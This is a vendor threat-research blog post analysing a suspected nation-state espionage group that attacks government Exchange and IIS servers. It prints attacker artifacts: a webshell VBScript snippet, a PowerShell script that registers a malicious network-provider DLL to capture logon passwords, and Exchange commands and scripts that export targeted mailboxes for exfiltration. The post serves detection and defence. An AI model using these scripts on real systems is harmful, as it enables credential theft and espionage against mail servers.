* [Blog](https://www2.paloaltonetworks.com/blog) * [Security Operations](https://www2.paloaltonetworks.com/blog/security-operations/) * [Must-Read Articles](https://www2.paloaltonetworks.com/blog/security-operations/category/must-read-articles/) * Through the Cortex XDR Le... # Through the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa [](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww2.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fthrough-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa%2F) [](https://twitter.com/share?text=Through+the+Cortex+XDR+Lens%3A+Uncovering+a+New+Activity+Group+Targeting+Governments+in+the+Middle+East+and+Africa&url=https%3A%2F%2Fwww2.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fthrough-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa%2F) [](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww2.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fthrough-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa%2F&title=Through+the+Cortex+XDR+Lens%3A+Uncovering+a+New+Activity+Group+Targeting+Governments+in+the+Middle+East+and+Africa&summary=&source=) [](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://www2.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/&ts=markdown) \[\](mailto:?subject=Through the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa) Link copied By [Lior Rochberger](https://www.paloaltonetworks.com/blog/author/lior-rochberger/?ts=markdown "Posts by Lior Rochberger") Jun 14, 2023 16 minutes [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown) [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [APT](https://www.paloaltonetworks.com/blog/tag/apt/?ts=markdown) [Cortex](https://www.paloaltonetworks.com/blog/tag/cortex/?ts=markdown) [Espionage](https://www.paloaltonetworks.com/blog/tag/espionage/?ts=markdown) [WebShell](https://www.paloaltonetworks.com/blog/tag/webshell/?ts=markdown) [XDR](https://www.paloaltonetworks.com/blog/tag/xdr/?ts=markdown) This post is also available in: [日本語 (Japanese)](https://www2.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/?lang=ja "Switch to Japanese(日本語)") ## **Executive Summary** The Cortex Threat Research team has recently identified multiple espionage attacks targeting governmental entities in the Middle East and Africa. According to our findings, the main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs. The attacks, which happened around the same time frame, shared several very unique similarities in tactics, techniques, and procedures (TTPs), with some of them never reported before in the wild, while other techniques are relatively rare, with just a handful of attackers reported using them. We currently track the activity group behind the attacks as CL-STA-0043. This activity group's level of sophistication, adaptiveness, and victimology suggest a highly capable APT threat actor, and it is suspected to be a nation-state threat actor. While tracking and analyzing CL-STA-0043, we discovered new evasive techniques and tools used by the attackers, such as an in-memory VBS implant to run webshell clandestinely, as well as a rare credential theft technique first seen in the wild. Perhaps one of the most interesting findings of this investigation is the rare and novel Exchange email exfiltration technique that was used by the attackers only on a few selected targets, according to our telemetry. In this blog post, we will provide information regarding the various TTPs observed in the attacks, including the execution as shown through the lens of the Palo Alto Networks Cortex XDR product. ## **Table of Contents** [Executive Summary](#post-296259-_zdjjbbl29xlf) [Table of Contents](#post-296259-_9qqpl1drpj3u) [Infection Vector: An In-Memory VBS Implant](#post-296259-_sohi76muwlzm) [Reconnaissance](#post-296259-_hhufnpm94x29) [Privilege Escalation](#post-296259-_u4d7ynxxul2t) [The Potato Suite](#post-296259-_pzobie8bauoi) [Sticky Keys Attack is Making a Comeback](#post-296259-_r4s8zoi2orfr) [Iislpe IIS PE](https://www.paloaltonetworks.com/blog/?p=296259&post_type=sec_ops_post&preview=1&_ppp=7e3b952e1a#post-296259-_pk58stnfmsp) [Credential Theft: Using Network Providers To Steal Credentials](#post-296259-_8femf4oipi0) [Lateral Movement](#post-296259-_h7xx1aaw885z) [Debuting Yasso: A New Penetration Toolset](#post-296259-_snpf19sx5vth) [Additional Lateral Movement TTPs](#post-296259-_uz6x6qvputqy) [Exfiltration: Stealing Targeted Email Data](#post-296259-_bx60rk6zf59f) [Abusing of the Exchange Management Shell](#post-296259-_aso1t99xk5zz) [Add PowerShell snap-in (PSSnapins) to steal emails](#post-296259-_861di2qftgjg) [Conclusion](#post-296259-_3tgjtn57dmzm) [Protections and Mitigations](#post-296259-_mf3k1d3b3om7) [Indicators Of Compromise](#post-296259-_t9yewnvksov5) [Additional Resources](#post-296259-_eoura034lmtc) ## **Infection Vector: An In-Memory VBS Implant** In the past couple of years, [multiple zero-day exploits](https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/) in on-premises IIS and Microsoft Exchange Servers led to a growing trend of exploiting these servers to gain an initial access to target networks. In most cases, the main post exploitation method observed in such attacks is to deploy various kinds of webshell, which provide the attackers access to the compromised network via a remote shell. During an investigation of one of the instances, we observed a series of failed attempts to execute the infamous [China Chopper](https://attack.mitre.org/software/S0020/) webshell, which were blocked by the Cortex XDR anti-webshell module. In the following days after the failed attempts, we observed a new suspicious activity originating from the Exchange Server's [w3wp.exe](https://stackify.com/w3wp-exe-iis-worker-process/) process, which upon investigation appeared to be resulting from an in-memory VBscript implant deployed by the threat actor. The activity was also detected by Cortex XDR. ![Figure 1. Detection of the Suspicious AMSI decode attempt, as shown in Cortex XDR.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-1.png) Figure 1. Detection of the Suspicious AMSI decode attempt, as shown in Cortex XDR. Below is a snippet of the in-memory VBscript: | "request.Item(""\""); IStringList.Item(); IServer.ScriptTimeout(""3600""); IServer.CreateObject(""Scripting.Dictionary""); IRequest.Form(""key""); IStringList.Item(); ISessionObject.Value(""payload""); IXMLDOMNode.\_00000029(""base64""); IXMLDOMElement.dataType(""bin.base64""); IXMLDOMElement.text(""\""); IXMLDOMElement.nodeTypedValue(); ISessionObject.Value(""payload""); IDictionary.Add(""payload"", ""Set Parameters=Server.CreateObject(""Scripting.Dictionary"") Function Base64Encode(sText) Dim oXML, oNode i""); IDictionary.Item(""payload""); IServer.CreateObject(""Scripting.Dictionary""); \_Stream.Charset(""iso-8859-1""); \_Stream.Type(""1""); \_Stream.Open(); \_Stream.Write(""Unsupported parameter type 00002011""); \ \_Stream.ReadText(); IServer.CreateObject(""WScript.shell""); IWshShell3.\_00000000(); IWshShell3.Exec("**"cmd /c ""cd /d ""C:/\/""\&ipconfig /all"" 2\>\&1"**");" | |----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| ## **Reconnaissance** Once the attackers had penetrated the network, they performed reconnaissance activity, mapping out the network and identifying critical assets. The attackers were mainly focused on finding administrative accounts and identifying important servers, such as: * Domain controllers * Web servers * Exchange servers * FTP servers * SQL databases To get this information, the attackers tried to execute the following tools: * Ladon web scanning tool (authored by "[k8gege](https://k8gege.org/)") * Custom network scanners * Nbtscan * Portscan * Windows commands: Netstat, nslookup, net, ipconfig, tasklist, quser ![Figure 2. Prevention of multiple tools by the Cortex XDR \& XSIAM](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-2.png) Figure 2. Prevention of multiple tools by the Cortex XDR \& XSIAM ## **Privilege Escalation** ### The Potato Suite In order to carry out the attacks successfully, the threat actors needed to run their tools and commands with adequate privileges (admin/system). To do so, they made use of different tools from the trending Potato suite. The Potato suite is a collection of various native Windows privilege escalation tools. The main tools that were observed during the investigation were: * [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) - a local privilege escalation tool, from a Windows service account to NT AUTHORITY\\SYSTEM. It is based on [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG). * [SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) - a local privilege escalation tool using [EfsRpc](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31), built from [SweetPotato](https://github.com/CCob/SweetPotato). Using those tools, the threat actor attempted to create administrative accounts, and to run various tools that require elevated privileges. ![Figure 3. Prevention of JuicyPotatoNG by the Cortex XDR \& XSIAM WildFire module](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-3.png) Figure 3. Prevention of JuicyPotatoNG by the Cortex XDR \& XSIAM WildFire module ### Sticky Keys Attack is Making a Comeback Another technique that we observed during the attacks was the well-known privilege escalation technique called "[Sticky Keys](https://attack.mitre.org/techniques/T1546/008/)". The Windows operating system contains accessibility features that may be launched with a key combination before a user has logged in to the system, or by an unprivileged user. An attacker can modify the way these programs are launched to get a command prompt or a backdoor. One of the common accessibility features is [sethc.exe](https://www.processlibrary.com/en/directory/files/sethc/28697/), which is often referred to as "Sticky Keys". In the attack, the attacker usually replaces the sethc.exe binary or pointers/references to these binaries in the registry, with cmd.exe. When executed, it provides an elevated command prompt shell to the attacker to run arbitrary commands and other tools. There were multiple observed attempts to edit the registry key for sethc.exe to point to cmd.exe and subsequently run the sethc.exe file with the parameter "211". This turns on the system's "Sticky Keys" feature which in return executes the elevated command prompt shell. ![Figure 4. Prevention of Sticky Key attack by the Cortex XDR \& XSIAM](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-4.png) Figure 4. Prevention of Sticky Key attack by the Cortex XDR \& XSIAM ### Iislpe IIS PE In addition, the attackers used a privilege escalation tool "Iislpe.exe", which is an IIS privilege escalation tool, written by "k8gege", the same author who created the aforementioned Ladon tool. ## **Credential Theft: Using Network Providers To Steal Credentials** In the attacks clustered under the CL-STA-0043 activity group, there were many techniques and tools deployed aiming to steal credentials, such as [Mimikatz](https://attack.mitre.org/software/S0002/), [Dumping the Sam key](https://attack.mitre.org/techniques/T1003/), [Forcing WDigest to store credentials in plaintext](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/forcing-wdigest-to-store-credentials-in-plaintext) and Dumping NTDS.dit file from the Active Directory using [ntdsutil.exe](https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntdsutil/). These techniques are all well-known and documented. However, one technique did stand out, since it was only first reported as a [POC](https://www.socinvestigation.com/credential-dumping-using-windows-network-providers-how-to-respond/) (Proof of Concept) in August 2022, and up to the time of writing this report, there were no public mentions of this technique being exploited in the wild. Using this method, the attackers executed a PowerShell script that registered a new network provider, named "ntos", set to execute a malicious DLL, ntos.dll, dropped by the attacker in the C:\\Windows\\system32 folder. | $path = Get-ItemProperty -Path ""HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order"" -Name PROVIDERORDER $UpdatedValue = $Path.PROVIDERORDER + "",ntos"" Set-ItemProperty -Path $Path.PSPath -Name ""PROVIDERORDER"" -Value $UpdatedValue New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name ""Class"" -Value 2 New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name ""Name"" -Value ntos New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\ntos\\NetworkProvider -Name ""ProviderPath"" -PropertyType ExpandString -Value ""%SystemRoot%\\System32\\ntos.dll"" | |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| As part of the login activity, Winlogon.exe captures the user and password and forwards them to mpnotify.exe, which loads the malicious DLL and shares the cleartext passwords with it. The malicious DLL then creates a new file, containing the stolen credentials. This file is then sent to the command and control server (C2) of the attackers. ![Figure 5. Prevention of the credential theft attempt, as shown in Cortex XDR \& XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-5.png) Figure 5. Prevention of the credential theft attempt, as shown in Cortex XDR \& XSIAM. ## **Lateral Movement** ### Debuting Yasso: A New Penetration Toolset As part of the investigation of the activity in CL-STA-0043, we observed the use of a relatively new penetration testing toolset - "[Yasso](https://github.com/LYingSiMon/Yasso)". Interestingly, although this tool has been publicly available since January 2022, and at the time of this report, there were no publicly reported cases where this tool was used in the wild. Yasso, authored by a Mandarin-speaking pentester nicknamed [Sairson](https://github.com/sairson), is an open source multi-platform intranet-assisted penetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and running arbitrary commands. In addition, Yasso has powerful SQL penetration functions, and it provides a range of database functionalities for the operator to perform remote actions. ![Figure 6. Yasso command line tool.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-6.png) Figure 6. Yasso command line tool. The following Yasso modules were most in use during the attacks: * **SMB**-- SMB Service blowup module * **Winrm**-- Winrm service blowup module * **SSH**-- SSH service burst module, fully interactive shell connection * **MSSQL**-- SQL Server service blowup module and powerlifting auxiliary module The use of the different Yasso modules were detected in the Cortex XDR \& XSIAM product, as shown in Figure 7. ![Figure 7. Detection of the Yasso tool execution, as shown in Cortex XDR \& XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-7.png) Figure 7. Detection of the Yasso tool execution, as shown in Cortex XDR \& XSIAM. Those modules, in combination with text files that contain target endpoints, usernames and passwords, were used to perform a [NTLM spray attack](https://attack.mitre.org/techniques/T1110/003/). In this attack, the attacker tried to log in to multiple servers using different combinations of multiple users and passwords in a short period of time. Cortex XDR \& XSIAM's [Identity Analytics](https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/techbriefs/cortex-xdr-identity-analytics) module detected the anomaly and raised multiple alerts for the suspicious behavior, as shown in Figure 8. ![Figure 8. Detection by the Identity Analytics module of the NTLM spray attack, as shown in Cortex XDR \& XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-8.png) Figure 8. Detection by the Identity Analytics module of the NTLM spray attack, as shown in Cortex XDR \& XSIAM. ### Additional Lateral Movement TTPs Besides the use of Yasso for lateral movement, the attackers were also observed using other common and known techniques to accomplish that. The tools observed were mostly native Windows tools such as WMI, Scheduled task, [Winrs](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs) and Net. In addition, the use of [Samba SMBclient](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html) for lateral movement was observed in some instances. ## **Exfiltration: Stealing Targeted Email Data** One of the most interesting techniques observed in the attacks was the targeted data exfiltration method from the compromised Exchange servers. A variation of this technique was reported before to be used by [Hafnium](https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/). This activity consists of abusing the Exchange Management Shell or PowerShell scripts in order to steal emails and PST files according to specific keywords that the threat actors deem important. To gather those emails, two very unique methods were observed: * Abuse of the Exchange Management Shell * Add PowerShell snap-in (PSSnapins) to steal emails through a script ![Figure 9. Prevention of the Exchange management shell abuse, as shown in Cortex XDR \& XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-9.png) Figure 9. Prevention of the Exchange management shell abuse, as shown in Cortex XDR \& XSIAM. ### Abusing of the Exchange Management Shell In the first method, we observed the abuse of the Exchange Management Shell (exshell.psc1) to run a command that saved all emails from users that contain the string "foreign" and all emails sent from or to governmental accounts, into csv files. | powershell.exe -psconsolefile "C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1" -command "get-mailbox -Filter \\"UserPrincipalName -Like \\"\*foreign\*\\"\\" -ResultSize Unlimited | get-mailboxstatistics | sort-object TotalItemSize -Descending | Select-Object DisplayName,Alias,TotalItemSize -First 30 | export-csv c:\\users\\public\\\\\\.csv" | |---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | powershell.exe -psconsolefile "C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1" -command "Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.Recipients -like \\"\*@\.gov.\\\"}| select-object Sender,{$_.Recipients},{$\_.MessageSubject} | export-csv c:\\users\\public\\\\\\.csv" | |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | powershell.exe -psconsolefile "C:\\Program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1" -command "Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.sender -like \\"\*@\.gov.\\\"}| select-object Sender,{$_.Recipients},{$\_.MessageSubject} | export-csv c:\\users\\public\\\\\\.csv" | |-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| In addition to the command lines above, other searches for specific content (using the filter "($\_.MessageSubject -like '\*\\*')") were observed as well. Those searches were for very specific individuals and information related to highly sensitive stately and foreign policy matters. ### Add PowerShell snap-in (PSSnapins) to steal emails In the second method, we observed the execution of multiple PowerShell scripts that add [PowerShell snap-ins](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_pssnapins?view=powershell-5.1) of Exchange, to allow the attackers to manage the Exchange server and steal emails. Below is a snippet of the script which originally contained over 30 targeted mailboxes of individuals, embassies, military-related organizations, and others. | \\r\\n$date=(Get-Date).AddDays(-3);\\r\\n$server=$env:computername;\\r\\n$path=\\"\\\\\\\\\\\\\\\\$server\\\\\\\\c$\\\\\\\\users\\\\\\\\public\\\\\\\\libraries\\\\\\\\\\" + \[Guid\]::newGuid().ToString();\\r\\nmkdir $path;\\r\\nAdd-PSSnapin Microsoft.Exchange.Management.Powershell.E2010;\\r\\n$culture = \[System.Globalization.CultureInfo\]::CreateSpecificCulture(\\"en-US\\");\\r\\n$culture.NumberFormat.NumberDecimalSeparator = \\".\\";\\r\\n$culture.NumberFormat.NumberGroupSeparator = \\",\\";\\r\\n\[System.Threading.Thread\]::CurrentThread.CurrentCulture = $culture;\\r\\n$filter = \\"(Received -ge'$date') -or (Sent -ge'$date')\\";\\r\\nNew-MailboxExportRequest -Name Request1 -Mailbox '\.atlanta' -ContentFilter $filter -FilePath \\"$path\\\\\\\\\.atlanta.pst\\";\\r\\nNew-MailboxExportRequest -Name Request2 -Mailbox '\.Kuwait' -ContentFilter $filter -FilePath \\"$path\\\\\\\\\.Kuwait.pst\\";\\r\\nNew-MailboxExportRequest -Name Request3 -Mailbox '\.Ankara' -ContentFilter $filter -FilePath \\"$path\\\\\\\\\.Ankara.pst\\";\\r\\nNew-MailboxExportRequest -Name Request4 -Mailbox '\.Paris' -ContentFilter $filter -FilePath \\"$path\\\\\\\\\.Paris.pst\\";\\r\\nNew-MailboxExportRequest -Name Request5 -Mailbox 'permanentsecretary' -ContentFilter $filter -FilePath \\"$path\\\\\\\\permanentsecretary.pst\\";\\r\\n# New-MailboxExportRequest -Name Request6 -Mailbox '\ Press Office' -ContentFilter $filter -FilePath \\"$path\\\\\\\\\.Press.Office.pst\\"; | |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| The output of those scripts were saved into .tiff files, under "c:\\users\\public\\\", which were later compressed, password-protected and sent to the attacker's C2 server as well. ![Figure 10. Exchange management shell abuse, as shown in Cortex XDR \& XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-10.png) Figure 10. Exchange management shell abuse, as shown in Cortex XDR \& XSIAM. ![Figure 11. Identity analytics alert for 7zip process accessing outlook files, as shown in the Cortex XDR \& XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-11.png) Figure 11. Identity analytics alert for 7zip process accessing outlook files, as shown in the Cortex XDR \& XSIAM. ## **Conclusion** In this blog, we uncovered several previously unreported and rare techniques and tools observed used by a cluster of activity we refer to as CL-STA-0043. While the research is still ongoing, and the full identity of the threat actor/s is still being studied, we believe that the level of sophistication, determination and espionage motives demonstrated in this report, bear the hallmarks of a true advanced persistent threat, potentially operating on behalf of nation-state interests. In the same vein, this sheds light on how threat actors seek to obtain non-public and confidential information about geopolitical related topics and high-ranking public service individuals. ## **Protections and Mitigations** During the attacks, Cortex XDR \& XSIAM raised many alerts for the malicious activities observed in CL-STA-0043. Prevention and detection alerts were raised for each phase of the attack: the initial access attempts, the use of rare tools and the advanced technique, and for the data exfiltration attempts. [SmartScore](https://www.paloaltonetworks.com/blog/security-operations/beating-alert-fatigue-with-cortex-xdr-smartscore-technology/), a unique ML-driven scoring engine that translates security investigation methods and their associated data into a hybrid scoring system, scored this incident a 100 score - the highest level of risk. ![Figure 12. SmartScore information about the incident](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-12.png) Figure 12. SmartScore information about the incident For Palo Alto Networks customers, our products and services provide the following coverage associated with this group: [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w) detects user and credential-based threats by analyzing user activity from multiple data sources including endpoints, network firewalls, Active Directory, identity and access management solutions, and cloud workloads. It builds behavioral profiles of user activity over time with machine learning. By comparing new activity to past activity, peer activity, and the expected behavior of the entity, Cortex XDR detects anomalous activity indicative of credential-based attacks. It also offers the following protections related to the attacks discussed in this post: * Prevents the execution of known malicious malware and also prevents the execution of unknown malware using [Behavioral Threat Protection and](https://www.paloaltonetworks.com/products/secure-the-network/subscriptions/threat-prevention?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w) machine learning based on the Local Analysis module. * Protects against credential gathering tools and techniques using the new Credential Gathering Protection available from Cortex XDR 3.4. * Protects from threat actors dropping and executing commands from webshells using Anti Webshell Protection, newly released in Cortex XDR 3.4. * Protects against exploitation of different vulnerabilities including ProxyShell and ProxyLogon using the Anti-Exploitation modules as well as Behavioral Threat Protection. * Cortex XDR Pro [detects post-exploit activity](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/analytics-alerts-by-required-data-source), including credential-based attacks, with behavioral analytics. If you think you may have been impacted or have an urgent matter, get in touch with the [Unit 42 Incident Response team](http://start.paloaltonetworks.com/contact-unit42.html?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w) or call: North America Toll-Free: 866.486.4842 (866.4.UNIT42) EMEA: +31.20.299.3130 APAC: +65.6983.8730 Japan: +81.50.1790.0200 ## **Indicators Of Compromise** **Yasso** 6b37aec6253c336188d9c8035e90818a139e3425c6e590734f309bd45021f980 **Credential Dumping Tool (sam.exe)** 77a3fa80621af4e1286b9dd07edaa37c139ca6c18e5695bc9b2c644a808f9d60 **iislpe.exe** 73b9cf0e64be1c05a70a9f98b0de4925e62160e557f72c75c67c1b8922799fc4 **SMBexec** E781ce2d795c5dd6b0a5b849a414f5bd05bb99785f2ebf36edb70399205817ee **nbtscan** 0f22e178a1e1d865fc31eb5465afbb746843b223bfa0ed1f112a02ccb6ce3f41 **Ladon** 291bc4421382d51e9ee42a16378092622f8eda32bf6b912c9a2ce5d962bcd8f4 aa99ae823a3e4c65969c1c3aa316218f5829544e4a433a4bab9f21df11d16154 ddcf878749611bc8b867e99d27f0bb8162169a8596a0b2676aa399f0f12bcbd7 **ntos.dll** bcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df ## Additional Resources * [Hunting for the Recent Attacks Targeting Microsoft Exchange](https://www.paloaltonetworks.com/blog/security-operations/attacks-targeting-microsoft-exchange/) * [Stopping "PowerShell without PowerShell" Attacks](https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/) * [Detecting Credential Stealing with Cortex XDR](https://www.paloaltonetworks.com/blog/security-operations/detecting-credential-stealing-with-cortex-xdr/) * [Credential Gathering From Third-Party Software](https://unit42.paloaltonetworks.com/credential-gathering-third-party-software/) * [Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells](https://unit42.paloaltonetworks.com/china-chopper-webshell/) * [THOR: Previously Unseen PlugX Variant Deployed During Microsoft Exchange Server Attacks by PKPLUG Group](https://unit42.paloaltonetworks.com/thor-plugx-variant/) * [https://broadcom-software.security.com/blogs/threat-intelligence/witchetty-steganography-espionage](https://broadcom-software.security.com/blogs/threat-intelligence/witchetty-steganography-espionage) * [https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/](https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/) * [https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/](https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/) *** ** * ** *** ## Related Blogs ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [#### Cortex Copilot - Another Step Forward in SOC Transformation](https://www2.paloaltonetworks.com/blog/security-operations/cortex-copilot-another-step-forward-in-soc-transformation/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [#### What's Next in Cortex: New Innovations for Security Operations](https://www2.paloaltonetworks.com/blog/security-operations/whats-next-in-cortex-new-innovations-for-security-operations/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [#### What's New in Cortex](https://www2.paloaltonetworks.com/blog/security-operations/whats-new-in-cortex/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [#### How Cortex Defends Against Microsoft SharePoint "ToolShell" Exploits](https://www2.paloaltonetworks.com/blog/security-operations/how-cortex-defends-against-microsoft-sharepoint-toolshell-exploits/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown) [#### What's New for Cortex and Cortex Cloud (Apr '25)](https://www2.paloaltonetworks.com/blog/security-operations/whats-new-for-cortex-and-cortex-cloud-apr-25/) ### [AI and Cybersecurity](https://www.paloaltonetworks.com/blog/security-operations/category/ai-and-cybersecurity/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [#### NL2XQL: Turning Natural Language into Powerful Cybersecurity Querying](https://www2.paloaltonetworks.com/blog/security-operations/nl2xql-turning-natural-language-into-powerful-cybersecurity-querying/) ### Subscribe to Security Operations Blogs! Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more. ![spinner](https://www2.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up Please enter a valid email. By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder. This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply. {#footer} {#footer} ## Products and Services * [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown) * [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown) * [Prisma 